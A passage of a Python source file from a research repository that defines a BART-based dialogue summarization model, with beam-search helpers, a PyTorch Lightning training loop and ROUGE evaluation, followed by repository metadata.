See\n :meth:`transformers.PreTrainedTokenizer.encode` and :meth:`transformers.PreTrainedTokenizer.__call__`\n for details.\n\n `What are input IDs? <../glossary.html#input-ids>`__\n attention_mask (:obj:`torch.Tensor` of shape :obj:`(batch_size, sequence_length)`, `optional`):\n Mask to avoid performing attention on padding token indices. Mask values selected in ``[0, 1]``:\n\n - 1 for tokens that are **not masked**,\n - 0 for tokens that are **masked**.\n\n `What are attention masks? <../glossary.html#attention-mask>`__\n head_mask (:obj:`torch.Tensor` of shape :obj:`(encoder_layers, encoder_attention_heads)`, `optional`):\n Mask to nullify selected heads of the attention modules. Mask values selected in ``[0, 1]``:\n\n - 1 indicates the head is **not masked**,\n - 0 indicates the head is **masked**.\n\n inputs_embeds (:obj:`torch.FloatTensor` of shape :obj:`(batch_size, sequence_length, hidden_size)`, `optional`):\n Optionally, instead of passing :obj:`input_ids` you can choose to directly pass an embedded\n representation. This is useful if you want more control over how to convert :obj:`input_ids` indices\n into associated vectors than the model's internal embedding lookup matrix.\n output_attentions (:obj:`bool`, `optional`):\n Whether or not to return the attentions tensors of all attention layers. See ``attentions`` under\n returned tensors for more detail.\n output_hidden_states (:obj:`bool`, `optional`):\n Whether or not to return the hidden states of all layers. See ``hidden_states`` under returned tensors\n for more detail.\n return_dict (:obj:`bool`, `optional`):\n Whether or not to return a :class:`~transformers.file_utils.ModelOutput` instead of a plain tuple.\n \"\"\"\n output_attentions = (\n output_attentions\n if output_attentions is not None\n else self.config.output_attentions\n )\n output_hidden_states = (\n output_hidden_states\n if output_hidden_states is not None\n else self.config.output_hidden_states\n )\n return_dict = (\n return_dict if return_dict is not None else self.config.use_return_dict\n )\n\n # retrieve input_ids and inputs_embeds\n if input_ids is not None and inputs_embeds is not None:\n raise ValueError(\n \"You cannot specify both input_ids and inputs_embeds at the same time\"\n )\n elif input_ids is not None:\n input_shape = input_ids.size()\n input_ids = input_ids.view(-1, input_shape[-1])\n elif inputs_embeds is not None:\n input_shape = inputs_embeds.size()[:-1]\n else:\n raise ValueError(\"You have to specify either input_ids or inputs_embeds\")\n\n if inputs_embeds is None:\n inputs_embeds = self.embed_tokens(input_ids) * self.embed_scale\n\n embed_pos = self.embed_positions(input_shape)\n\n hidden_states = inputs_embeds + embed_pos\n hidden_states = self.layernorm_embedding(hidden_states)\n hidden_states = nn.functional.dropout(\n hidden_states, p=self.dropout, training=self.training\n )\n\n # expand attention_mask\n if attention_mask is not None:\n # [bsz, seq_len] -> [bsz, 1, tgt_seq_len, src_seq_len]\n attention_mask = _expand_mask(attention_mask, inputs_embeds.dtype)\n\n encoder_states = () if output_hidden_states else None\n all_attentions = () if output_attentions else None\n\n # check if head_mask has a correct number of layers specified if desired\n if head_mask is not None:\n assert head_mask.size()[0] == (\n len(self.layers)\n ), f\"The head_mask should be specified for {len(self.layers)} layers, but it is for {head_mask.size()[0]}.\"\n for idx, encoder_layer in enumerate(self.layers):\n if output_hidden_states:\n encoder_states = 
encoder_states + (hidden_states,)\n # add LayerDrop (see https://arxiv.org/abs/1909.11556 for description)\n dropout_probability = random.uniform(0, 1)\n if self.training and (\n dropout_probability < self.layerdrop\n ): # skip the layer\n layer_outputs = (None, None)\n else:\n if (\n getattr(self.config, \"gradient_checkpointing\", False)\n and self.training\n ):\n\n def create_custom_forward(module):\n def custom_forward(*inputs):\n return module(*inputs, output_attentions)\n\n return custom_forward\n\n layer_outputs = torch.utils.checkpoint.checkpoint(\n create_custom_forward(encoder_layer),\n hidden_states,\n attention_mask,\n (head_mask[idx] if head_mask is not None else None),\n )\n else:\n layer_outputs = encoder_layer(\n hidden_states,\n attention_mask,\n layer_head_mask=(\n head_mask[idx] if head_mask is not None else None\n ),\n output_attentions=output_attentions,\n )\n\n hidden_states = layer_outputs[0]\n\n if output_attentions:\n all_attentions = all_attentions + (layer_outputs[1],)\n\n if output_hidden_states:\n encoder_states = encoder_states + (hidden_states,)\n\n if not return_dict:\n return tuple(\n v\n for v in [hidden_states, encoder_states, all_attentions]\n if v is not None\n )\n return BaseModelOutput(\n last_hidden_state=hidden_states,\n hidden_states=encoder_states,\n attentions=all_attentions,\n )\n\n\n# 原论文中重写了BartDecoder,bartEncoder,因为如果需要统一起来,gtbart的时候使用了\n# kwargs,所以需要重写\nclass baseBart(BartPretrainedModel):\n def __init__(self, config: BartConfig, cfg):\n super(baseBart, self).__init__(config)\n padding_idx, vocab_size = config.pad_token_id, config.vocab_size\n self.shared = nn.Embedding(vocab_size, config.d_model, padding_idx)\n\n if cfg.model.model_type == \"baseline\":\n self.encoder = BartEncoder(config, self.shared)\n self.decoder = BartDecoder(config, self.shared)\n elif cfg.model.model_type == \"gtbart\":\n pass\n # self.encoder = HierarchicalEncoder(config, self.shared)\n # self.decoder = BartDecoderWithDualCrossAttention(config, self.shared)\n else:\n print(\"请指定模型类型\")\n self.init_weights()\n\n def get_input_embeddings(self):\n return self.shared\n\n def set_input_embeddings(self, value):\n self.shared = value\n self.encoder.embed_tokens = self.shared\n self.decoder.embed_tokens = self.shared\n\n def get_encoder(self):\n return self.encoder\n\n def get_decoder(self):\n return self.decoder\n\n def forward(\n self,\n input_ids=None,\n attention_mask=None,\n decoder_input_ids=None,\n decoder_attention_mask=None,\n head_mask=None,\n decoder_head_mask=None,\n cross_attn_head_mask=None,\n encoder_outputs=None,\n past_key_values=None,\n inputs_embeds=None,\n decoder_inputs_embeds=None,\n use_cache=None,\n output_attentions=None,\n output_hidden_states=None,\n return_dict=None,\n ## additional\n **kwargs,\n ):\n # different to other models, Bart automatically creates decoder_input_ids from\n # input_ids if no decoder_input_ids are provided\n if decoder_input_ids is None and decoder_inputs_embeds is None:\n decoder_input_ids = shift_tokens_right(\n input_ids, self.config.pad_token_id, self.config.decoder_start_token_id\n )\n\n output_attentions = (\n output_attentions\n if output_attentions is not None\n else self.config.output_attentions\n )\n output_hidden_states = (\n output_hidden_states\n if output_hidden_states is not None\n else self.config.output_hidden_states\n )\n use_cache = use_cache if use_cache is not None else self.config.use_cache\n return_dict = (\n return_dict if return_dict is not None else self.config.use_return_dict\n )\n\n if 
encoder_outputs is None:\n encoder_outputs = self.encoder(\n input_ids=input_ids,\n attention_mask=attention_mask,\n head_mask=head_mask,\n inputs_embeds=inputs_embeds,\n output_attentions=output_attentions,\n output_hidden_states=output_hidden_states,\n return_dict=return_dict,\n **kwargs,\n )\n\n kwargs.update(encoder_outputs)\n\n if isinstance(encoder_outputs, BaseModelOutput): # baseline case\n encoder_hidden_states = encoder_outputs.last_hidden_state\n encoder_attention_mask = attention_mask\n elif isinstance(encoder_outputs, DualBaseModelOutput): # gtbart case\n encoder_hidden_states = (None,)\n encoder_attention_mask = None\n # decoder outputs consists of (dec_features, past_key_value, dec_hidden, dec_attn)\n decoder_outputs = self.decoder(\n input_ids=decoder_input_ids,\n attention_mask=decoder_attention_mask,\n encoder_hidden_states=encoder_hidden_states,\n encoder_attention_mask=encoder_attention_mask,\n head_mask=decoder_head_mask,\n cross_attn_head_mask=cross_attn_head_mask,\n past_key_values=past_key_values,\n inputs_embeds=decoder_inputs_embeds,\n use_cache=use_cache,\n output_attentions=output_attentions,\n output_hidden_states=output_hidden_states,\n return_dict=return_dict,\n **kwargs,\n )\n\n if not return_dict:\n return decoder_outputs + encoder_outputs\n\n return Seq2SeqModelOutput(\n last_hidden_state=decoder_outputs.last_hidden_state,\n past_key_values=decoder_outputs.past_key_values,\n decoder_hidden_states=decoder_outputs.hidden_states,\n decoder_attentions=decoder_outputs.attentions,\n cross_attentions=decoder_outputs.cross_attentions,\n # encoder_last_hidden_state=encoder_outputs.last_hidden_state,\n # encoder_hidden_states=encoder_outputs.hidden_states,\n # encoder_attentions=speaker_attentions,\n )\n\n\nclass TagBart(BartPretrainedModel):\n base_model_prefix = \"model\"\n _keys_to_ignore_on_load_missing = [r\"final_logits_bias\", r\"lm_head\\.weight\"]\n\n def __init__(self, config: BartConfig, cfg):\n super().__init__(config)\n self.model = baseBart(config, cfg=cfg)\n self.register_buffer(\n \"final_logits_bias\", torch.zeros((1, self.model.shared.num_embeddings))\n )\n self.lm_head = nn.Linear(\n config.d_model, self.model.shared.num_embeddings, bias=False\n )\n\n self.init_weights()\n\n def get_encoder(self):\n return self.model.get_encoder()\n\n def get_decoder(self):\n return self.model.get_decoder()\n\n def resize_token_embeddings(self, new_num_tokens: int) -> nn.Embedding:\n new_embeddings = super().resize_token_embeddings(new_num_tokens)\n self._resize_final_logits_bias(new_num_tokens)\n return new_embeddings\n\n def _resize_final_logits_bias(self, new_num_tokens: int) -> None:\n old_num_tokens = self.final_logits_bias.shape[-1]\n if new_num_tokens <= old_num_tokens:\n new_bias = self.final_logits_bias[:, :new_num_tokens]\n else:\n extra_bias = torch.zeros(\n (1, new_num_tokens - old_num_tokens),\n device=self.final_logits_bias.device,\n )\n new_bias = torch.cat([self.final_logits_bias, extra_bias], dim=1)\n self.register_buffer(\"final_logits_bias\", new_bias)\n\n def get_output_embeddings(self):\n return self.lm_head\n\n def set_output_embeddings(self, new_embeddings):\n self.lm_head = new_embeddings\n\n def forward(\n self,\n input_ids=None,\n attention_mask=None,\n decoder_input_ids=None,\n decoder_attention_mask=None,\n head_mask=None,\n decoder_head_mask=None,\n cross_attn_head_mask=None,\n encoder_outputs=None,\n past_key_values=None,\n inputs_embeds=None,\n decoder_inputs_embeds=None,\n labels=None,\n use_cache=None,\n output_attentions=True,\n 
output_hidden_states=None,\n return_dict=None,\n # additional\n **kwargs,\n ):\n return_dict = (\n return_dict if return_dict is not None else self.config.use_return_dict\n )\n # 然后再beam search 中调用模型的forward\n if labels is not None:\n if decoder_input_ids is None:\n decoder_input_ids = shift_tokens_right(\n labels, self.config.pad_token_id, self.config.decoder_start_token_id\n )\n\n outputs = self.model(\n input_ids,\n attention_mask=attention_mask,\n decoder_input_ids=decoder_input_ids,\n encoder_outputs=encoder_outputs,\n decoder_attention_mask=decoder_attention_mask,\n head_mask=head_mask,\n decoder_head_mask=decoder_head_mask,\n cross_attn_head_mask=cross_attn_head_mask,\n past_key_values=past_key_values,\n inputs_embeds=inputs_embeds,\n decoder_inputs_embeds=decoder_inputs_embeds,\n use_cache=use_cache,\n output_attentions=output_attentions,\n output_hidden_states=output_hidden_states,\n return_dict=return_dict,\n **kwargs,\n )\n lm_logits = self.lm_head(outputs[0]) + self.final_logits_bias\n\n masked_lm_loss = None\n if labels is not None:\n loss_fct = CrossEntropyLoss()\n masked_lm_loss = loss_fct(\n lm_logits.view(-1, self.config.vocab_size), labels.view(-1)\n )\n\n if not return_dict:\n output = (lm_logits,) + outputs[1:]\n return (\n ((masked_lm_loss,) + output) if masked_lm_loss is not None else output\n )\n\n return Seq2SeqLMOutput(\n loss=masked_lm_loss,\n logits=lm_logits,\n past_key_values=outputs.past_key_values,\n decoder_hidden_states=outputs.decoder_hidden_states,\n decoder_attentions=outputs.decoder_attentions,\n cross_attentions=outputs.cross_attentions,\n encoder_last_hidden_state=outputs.encoder_last_hidden_state,\n encoder_hidden_states=outputs.encoder_hidden_states,\n encoder_attentions=outputs.encoder_attentions,\n )\n\n # 下面这个函数在beam search的最开始的时候会调用\n def prepare_inputs_for_generation(\n self,\n decoder_input_ids,\n past=None,\n attention_mask=None,\n head_mask=None,\n use_cache=None,\n encoder_outputs=None,\n **kwargs,\n ):\n # cut decoder_input_ids if past is used #\n if past is not None:\n decoder_input_ids = decoder_input_ids[:, -1:]\n\n if kwargs.get(\"labels\", None) != None:\n kwargs.pop(\"labels\")\n\n return {\n \"input_ids\": None, # encoder_outputs is defined. 
input_ids not needed\n \"encoder_outputs\": encoder_outputs,\n \"past_key_values\": past,\n \"decoder_input_ids\": decoder_input_ids,\n \"attention_mask\": attention_mask,\n \"head_mask\": head_mask,\n \"use_cache\": use_cache, # change this to avoid caching (presumably for debugging)\n **kwargs,\n }\n\n def prepare_decoder_input_ids_from_labels(self, labels: torch.Tensor):\n return shift_tokens_right(\n labels, self.config.pad_token_id, self.config.decoder_start_token_id\n )\n\n @staticmethod\n def _reorder_cache(past, beam_idx): # 然后再modelforward之后调用这个函数\n reordered_past = () # 这里的beam_idx使用的是选择的beam的id\n for layer_past in past:\n # cached cross_attention states don't have to be reordered -> they are always the same\n reordered_past += (\n tuple(\n past_state.index_select(0, beam_idx)\n for past_state in layer_past[:2]\n )\n + layer_past[2:],\n )\n return reordered_past\n\n # for beam_search\n\n @staticmethod\n def _expand_inputs_for_generation( # generate step 2 在初始化beam_scorer之后\n input_ids, # 此时的input_ids变成了之前预备需要输入的那个batchsize 个0\n expand_size: int = 1, # 这个是5 应该是beam_num\n is_encoder_decoder: bool = False,\n attention_mask: torch.LongTensor = None, # 这个attention_mask还是之前的那个\n encoder_outputs: DualBaseModelOutput = None,\n **model_kwargs,\n ) -> Tuple[torch.LongTensor, Dict[str, Any]]:\n expanded_return_idx = (\n torch.arange(input_ids.shape[0])\n .view(-1, 1)\n .repeat(1, expand_size)\n .view(-1)\n .to(input_ids.device)\n ) # 5 个beam 4个sample 每个samaple对应5个beam\n input_ids = input_ids.index_select(0, expanded_return_idx) #\n if \"token_type_ids\" in model_kwargs:\n token_type_ids = model_kwargs[\"token_type_ids\"]\n model_kwargs[\"token_type_ids\"] = token_type_ids.index_select(\n 0, expanded_return_idx\n )\n\n if attention_mask is not None:\n if isinstance(attention_mask, list):\n model_kwargs[\"attention_mask\"] = [\n m.index_select(0, expanded_return_idx) for m in attention_mask\n ]\n else:\n model_kwargs[\"attention_mask\"] = attention_mask.index_select(\n 0, expanded_return_idx\n )\n\n # if 'special_tokens_mask' in model_kwargs.keys() is not None:\n # model_kwargs['special_tokens_mask'] = model_kwargs['special_tokens_mask'].index_select(0,expanded_return_idx)\n # 下面就是把能扩展的部分对应扩展到对应份数\n if is_encoder_decoder:\n assert encoder_outputs is not None\n device = encoder_outputs[0].device\n if \"last_hidden_state\" in encoder_outputs.keys():\n encoder_outputs[\"last_hidden_state\"] = encoder_outputs[\n \"last_hidden_state\"\n ].index_select(0, expanded_return_idx.to(device))\n if \"low_encoder_last_hidden_state\" in encoder_outputs.keys():\n encoder_outputs[\"low_encoder_last_hidden_state\"] = encoder_outputs[\n \"low_encoder_last_hidden_state\"\n ].index_select(0, expanded_return_idx.to(device))\n if \"high_encoder_last_hidden_state\" in encoder_outputs.keys():\n encoder_outputs[\"high_encoder_last_hidden_state\"] = encoder_outputs[\n \"high_encoder_last_hidden_state\"\n ].index_select(0, expanded_return_idx.to(device))\n if \"high_encoder_attention_mask\" in encoder_outputs.keys():\n encoder_outputs[\"high_encoder_attention_mask\"] = encoder_outputs[\n \"high_encoder_attention_mask\"\n ].index_select(0, expanded_return_idx.to(device))\n if \"low_encoder_attention_mask\" in encoder_outputs.keys():\n encoder_outputs[\"low_encoder_attention_mask\"] = encoder_outputs[\n \"low_encoder_attention_mask\"\n ].index_select(0, expanded_return_idx.to(device))\n\n model_kwargs[\"encoder_outputs\"] = encoder_outputs\n return input_ids, model_kwargs\n\n def estimate_tokens(self, input_dict: 
Dict[str, Union[torch.Tensor, Any]]) -> int:\n        \"\"\"\n        Helper function to estimate the total number of tokens from the model inputs.\n\n        Args:\n            inputs (:obj:`dict`): The model inputs.\n\n        Returns:\n            :obj:`int`: The total number of tokens.\n        \"\"\"\n        token_inputs = [tensor for key, tensor in input_dict.items() if \"input\" in key]\n        if token_inputs:\n            ret = 0\n            for token_input in token_inputs:\n                if isinstance(token_input, list) and isinstance(\n                    token_input[0], torch.Tensor\n                ):\n                    ret += sum([_token_input.numel() for _token_input in token_input])\n                elif isinstance(token_input, torch.Tensor):\n                    ret += token_input.numel()\n            return ret\n        else:\n            warnings.warn(\n                \"Could not estimate the number of tokens of the input, floating-point operations will not be computed\"\n            )\n            return 0\n\n    def _prepare_decoder_input_ids_for_generation(\n        self,\n        input_ids: torch.LongTensor,\n        decoder_start_token_id: int = None,\n        bos_token_id: int = None,\n    ) -> (\n        torch.LongTensor\n    ):  # input_ids here is the baseline input; decoder_start_token_id & bos = 0\n        decoder_start_token_id = self._get_decoder_start_token_id(\n            decoder_start_token_id, bos_token_id\n        )\n        if isinstance(input_ids, list):\n            bs = len(input_ids)\n            device = input_ids[0].device\n        else:\n            bs = input_ids.shape[0]\n            device = input_ids.device\n        decoder_input_ids = (\n            torch.ones((bs, 1), dtype=torch.long, device=device)\n            * decoder_start_token_id\n        )\n        return decoder_input_ids\n        # the function above only initializes batch_size start tokens\n\n\nclass plModel(LightningModule):\n    def __init__(self, cfg):\n        super(plModel, self).__init__()\n        self.cfg = cfg\n        path = os.path.join(cfg.hyperparam.models_ckpt_dir, cfg.model.backbone_type)\n        config = AutoConfig.from_pretrained(path)\n        self.tokenizer = AutoTokenizer.from_pretrained(path)\n        self.model = TagBart.from_pretrained(path, config=config, cfg=cfg)\n\n    def forward(self, inputs):\n        return self.model(**inputs)\n\n    def training_step(self, batch, batch_idx):\n        batch = self.shared_step(batch)\n        loss = self.model(**batch)[0]\n        if self.cfg.hyperparam.use_wandb:\n            wandb.log({\"train_loss\": loss})\n        self.log(\"train_loss\", loss, prog_bar=True)\n\n        return loss\n\n    def test_step(self, batch, batch_idx):\n        self.validation_step(batch, batch_idx)\n\n    def validation_step(self, batch: dict, batch_idx):\n        gen_kwargs = {\n            \"max_length\": 100,\n            \"min_length\": 5,\n            \"num_beams\": self.cfg.hyperparam.num_beams,\n            # \"synced_gpus\": True if is_deepspeed_zero3_enabled() else False,\n        }\n        batch = self.shared_step(batch)\n        if self.cfg.model.model_type == \"baseline\":\n            generated_tokens = self.model.generate(\n                batch[\"input_ids\"],\n                attention_mask=batch[\"attention_mask\"],\n                **gen_kwargs,\n            )\n\n        else:  # TODO\n            pass\n\n        if generated_tokens.shape[-1] < gen_kwargs[\"max_length\"]:\n            generated_tokens = self._pad_tensors_to_max_len(\n                generated_tokens, gen_kwargs[\"max_length\"]\n            )\n        has_labels = batch.get(\"labels\", None)\n        with torch.no_grad():\n            outputs = self.model(**batch)\n            if has_labels is not None:\n                loss = (\n                    (outputs[\"loss\"] if isinstance(outputs, dict) else outputs[0])\n                    .mean()\n                    .detach()\n                )\n            else:\n                loss = None\n        labels = batch[\"labels\"]\n        if labels.shape[-1] < gen_kwargs[\"max_length\"]:\n            labels = self._pad_tensors_to_max_len(labels, gen_kwargs[\"max_length\"])\n\n        result = self.compute_metrics((generated_tokens, labels))\n        print(result)\n        return (loss, generated_tokens, labels)\n\n    def postprocess_text(self, preds, labels):\n        preds = [pred.strip() for pred in preds]\n        labels = [label.strip() for label in labels]\n        preds = 
[\"\\n\".join(nltk.sent_tokenize(pred)) for pred in preds]\n labels = [\"\\n\".join(nltk.sent_tokenize(label)) for label in labels]\n return preds, labels\n\n def compute_metrics(self, eval_preds):\n preds, labels = eval_preds\n preds = preds.detach().cpu()\n labels = labels.detach().cpu()\n if isinstance(preds, tuple):\n preds = preds[0]\n decoded_preds = self.tokenizer.batch_decode(preds, skip_special_tokens=True)\n # if self.cfg.hyperparam.label_pad_id:\n # # Replace -100 in the labels as we can't decode them.\n # labels = np.where(labels != 1, labels, self.tokenizer.pad_token_id)\n decoded_labels = self.tokenizer.batch_decode(labels, skip_special_tokens=True)\n\n # Some simple post-processing\n decoded_preds, decoded_labels = self.postprocess_text(\n decoded_preds, decoded_labels\n )\n\n result = {}\n metrics_ls = [get_rouge_score] # ,get_bert_score,get_meteor_score]\n for metrics in metrics_ls:\n res = metrics(decoded_preds, decoded_labels)\n result.update(res)\n # keys: rouge-1(f,p,r),rouge-2,rouge-l,bert_p,bert_r,bert_f,meteor\n # Extract a few results from ROUGE\n result[\"rouge-1\"] = result[\"rouge-1\"][\"f\"] * 100\n result[\"rouge-2\"] = result[\"rouge-2\"][\"f\"] * 100\n result[\"rouge-l\"] = result[\"rouge-l\"][\"f\"] * 100\n\n prediction_lens = [\n np.count_nonzero(pred != self.tokenizer.pad_token_id) for pred in preds\n ]\n result[\"gen_len\"] = np.mean(prediction_lens)\n result = {k: round(v, 4) for k, v in result.items()}\n return result\n\n def _pad_tensors_to_max_len(self, tensor, max_length):\n if self.tokenizer is None:\n raise ValueError(\n f\"Tensor need to be padded to `max_length={max_length}` but no tokenizer was passed when creating \"\n \"this `Trainer`. Make sure to create your `Trainer` with the appropriate tokenizer.\"\n )\n # If PAD token is not defined at least EOS token has to be defined\n pad_token_id = (\n self.tokenizer.pad_token_id\n if self.tokenizer.pad_token_id is not None\n else self.tokenizer.eos_token_id\n )\n\n padded_tensor = pad_token_id * torch.ones(\n (tensor.shape[0], max_length), dtype=tensor.dtype, device=tensor.device\n )\n padded_tensor[:, : tensor.shape[-1]] = tensor\n return padded_tensor\n\n def shared_step(self, batch):\n batch[\"labels\"] = batch[\"decoder_input_ids\"]\n for k in batch.keys():\n batch[k] = batch[k].to(self.device)\n return batch\n\n def configure_optimizers(self):\n steps = (\n self.cfg.dataset.train_dataset_len\n // self.cfg.hyperparam.train_batch_size\n // self.cfg.hyperparam.gradient_accumulation_step\n * self.cfg.hyperparam.train_epochs\n )\n optimizer = AdamW(\n self.model.parameters(),\n lr=self.cfg.optimizer.lr,\n eps=self.cfg.optimizer.eps,\n weight_decay=self.cfg.optimizer.weight_decay,\n )\n scheduler = get_linear_schedule_with_warmup(\n optimizer,\n num_warmup_steps=self.cfg.scheduler.warmup_steps,\n num_training_steps=steps,\n )\n return [optimizer], [{\"scheduler\": scheduler, \"interval\": \"step\"}]\n\n def confgiure_callbacks(self):\n save_name = \"{}-{}-{}-{}.pt\".format(\n time.localtime().tm_mon,\n time.localtime().tm_mday,\n time.localtime().tm_hour,\n time.localtime().tm_min,\n )\n callbacks = saveCallBack(self.cfg, save_name, mode=self.cfg.hyperparam.mode)\n return [callbacks]\n", "repo_name": "kui253/Entity_with_utt_graph", "sub_path": "src/model.py", "file_name": "model.py", "file_ext": "py", "file_size_in_byte": 46084, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "logging.getLogger", "line_number": 40, 
"usage_type": "call"}, {"api_name": "transformers.models.bart.modeling_bart.BartPretrainedModel", "line_number": 43, "usage_type": "name"}, {"api_name": "transformers.models.bart.modeling_bart.BartConfig", "line_number": 52, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 52, "usage_type": "name"}, {"api_name": "torch.nn.Embedding", "line_number": 52, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 52, "usage_type": "name"}, {"api_name": "math.sqrt", "line_number": 58, "usage_type": "call"}, {"api_name": "torch.nn.Embedding", "line_number": 63, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 63, "usage_type": "name"}, {"api_name": "transformers.models.bart.modeling_bart.BartLearnedPositionalEmbedding", "line_number": 67, "usage_type": "call"}, {"api_name": "torch.nn.ModuleList", "line_number": 71, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 71, "usage_type": "name"}, {"api_name": "transformers.models.bart.modeling_bart.BartDecoderLayer", "line_number": 72, "usage_type": "call"}, {"api_name": "torch.nn.LayerNorm", "line_number": 74, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 74, "usage_type": "name"}, {"api_name": "transformers.models.bart.modeling_bart._make_causal_mask", "line_number": 91, "usage_type": "call"}, {"api_name": "transformers.models.bart.modeling_bart._expand_mask", "line_number": 99, "usage_type": "call"}, {"api_name": "transformers.models.bart.modeling_bart._expand_mask", "line_number": 239, "usage_type": "call"}, {"api_name": "torch.nn.functional.dropout", "line_number": 249, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 249, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 249, "usage_type": "name"}, {"api_name": "random.uniform", "line_number": 273, "usage_type": "call"}, {"api_name": "torch.utils.checkpoint.checkpoint", "line_number": 296, "usage_type": "call"}, {"api_name": "torch.utils", "line_number": 296, "usage_type": "attribute"}, {"api_name": "transformers.modeling_outputs.BaseModelOutputWithPastAndCrossAttentions", "line_number": 352, "usage_type": "call"}, {"api_name": "transformers.models.bart.modeling_bart.BartPretrainedModel", "line_number": 361, "usage_type": "name"}, {"api_name": "transformers.models.bart.modeling_bart.BartConfig", "line_number": 371, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 371, "usage_type": "name"}, {"api_name": "torch.nn.Embedding", "line_number": 371, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 371, "usage_type": "name"}, {"api_name": "math.sqrt", "line_number": 380, "usage_type": "call"}, {"api_name": "torch.nn.Embedding", "line_number": 385, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 385, "usage_type": "name"}, {"api_name": "transformers.models.bart.modeling_bart.BartLearnedPositionalEmbedding", "line_number": 389, "usage_type": "call"}, {"api_name": "torch.nn.ModuleList", "line_number": 393, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 393, "usage_type": "name"}, {"api_name": "transformers.models.bart.modeling_bart.BartEncoderLayer", "line_number": 394, "usage_type": "call"}, {"api_name": "torch.nn.LayerNorm", "line_number": 396, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 396, "usage_type": "name"}, {"api_name": "torch.nn.functional.dropout", "line_number": 482, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 482, "usage_type": "attribute"}, {"api_name": 
"torch.nn", "line_number": 482, "usage_type": "name"}, {"api_name": "transformers.models.bart.modeling_bart._expand_mask", "line_number": 489, "usage_type": "call"}, {"api_name": "random.uniform", "line_number": 503, "usage_type": "call"}, {"api_name": "torch.utils.checkpoint.checkpoint", "line_number": 520, "usage_type": "call"}, {"api_name": "torch.utils", "line_number": 520, "usage_type": "attribute"}, {"api_name": "transformers.modeling_outputs.BaseModelOutput", "line_number": 550, "usage_type": "call"}, {"api_name": "transformers.models.bart.modeling_bart.BartPretrainedModel", "line_number": 559, "usage_type": "name"}, {"api_name": "transformers.models.bart.modeling_bart.BartConfig", "line_number": 560, "usage_type": "name"}, {"api_name": "torch.nn.Embedding", "line_number": 563, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 563, "usage_type": "name"}, {"api_name": "transformers.models.bart.modeling_bart.shift_tokens_right", "line_number": 613, "usage_type": "call"}, {"api_name": "transformers.modeling_outputs.BaseModelOutput", "line_number": 646, "usage_type": "argument"}, {"api_name": "model_utils.DualBaseModelOutput", "line_number": 649, "usage_type": "argument"}, {"api_name": "transformers.modeling_outputs.Seq2SeqModelOutput", "line_number": 672, "usage_type": "call"}, {"api_name": "transformers.models.bart.modeling_bart.BartPretrainedModel", "line_number": 684, "usage_type": "name"}, {"api_name": "transformers.models.bart.modeling_bart.BartConfig", "line_number": 688, "usage_type": "name"}, {"api_name": "torch.zeros", "line_number": 692, "usage_type": "call"}, {"api_name": "torch.nn.Linear", "line_number": 694, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 694, "usage_type": "name"}, {"api_name": "torch.nn.Embedding", "line_number": 706, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 706, "usage_type": "name"}, {"api_name": "torch.zeros", "line_number": 716, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 720, "usage_type": "call"}, {"api_name": "transformers.models.bart.modeling_bart.shift_tokens_right", "line_number": 756, "usage_type": "call"}, {"api_name": "torch.nn.CrossEntropyLoss", "line_number": 782, "usage_type": "call"}, {"api_name": "transformers.modeling_outputs.Seq2SeqLMOutput", "line_number": 793, "usage_type": "call"}, {"api_name": "torch.Tensor", "line_number": 834, "usage_type": "attribute"}, {"api_name": "transformers.models.bart.modeling_bart.shift_tokens_right", "line_number": 835, "usage_type": "call"}, {"api_name": "torch.LongTensor", "line_number": 860, "usage_type": "attribute"}, {"api_name": "model_utils.DualBaseModelOutput", "line_number": 861, "usage_type": "name"}, {"api_name": "torch.arange", "line_number": 865, "usage_type": "call"}, {"api_name": "typing.Tuple", "line_number": 863, "usage_type": "name"}, {"api_name": "torch.LongTensor", "line_number": 863, "usage_type": "attribute"}, {"api_name": "typing.Dict", "line_number": 863, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 863, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 918, "usage_type": "name"}, {"api_name": "typing.Union", "line_number": 918, "usage_type": "name"}, {"api_name": "torch.Tensor", "line_number": 918, "usage_type": "attribute"}, {"api_name": "typing.Any", "line_number": 918, "usage_type": "name"}, {"api_name": "torch.Tensor", "line_number": 933, "usage_type": "attribute"}, {"api_name": "torch.Tensor", "line_number": 936, "usage_type": "attribute"}, {"api_name": 
"torch.LongTensor", "line_number": 947, "usage_type": "attribute"}, {"api_name": "torch.ones", "line_number": 963, "usage_type": "call"}, {"api_name": "torch.long", "line_number": 963, "usage_type": "attribute"}, {"api_name": "torch.LongTensor", "line_number": 951, "usage_type": "attribute"}, {"api_name": "pytorch_lightning.LightningModule", "line_number": 970, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 974, "usage_type": "call"}, {"api_name": "os.path", "line_number": 974, "usage_type": "attribute"}, {"api_name": "transformers.AutoConfig.from_pretrained", "line_number": 975, "usage_type": "call"}, {"api_name": "transformers.AutoConfig", "line_number": 975, "usage_type": "name"}, {"api_name": "transformers.AutoTokenizer.from_pretrained", "line_number": 976, "usage_type": "call"}, {"api_name": "transformers.AutoTokenizer", "line_number": 976, "usage_type": "name"}, {"api_name": "wandb.log", "line_number": 986, "usage_type": "call"}, {"api_name": "torch.no_grad", "line_number": 1017, "usage_type": "call"}, {"api_name": "nltk.sent_tokenize", "line_number": 1038, "usage_type": "call"}, {"api_name": "nltk.sent_tokenize", "line_number": 1039, "usage_type": "call"}, {"api_name": "global_utils.get_rouge_score", "line_number": 1060, "usage_type": "name"}, {"api_name": "numpy.count_nonzero", "line_number": 1071, "usage_type": "call"}, {"api_name": "numpy.mean", 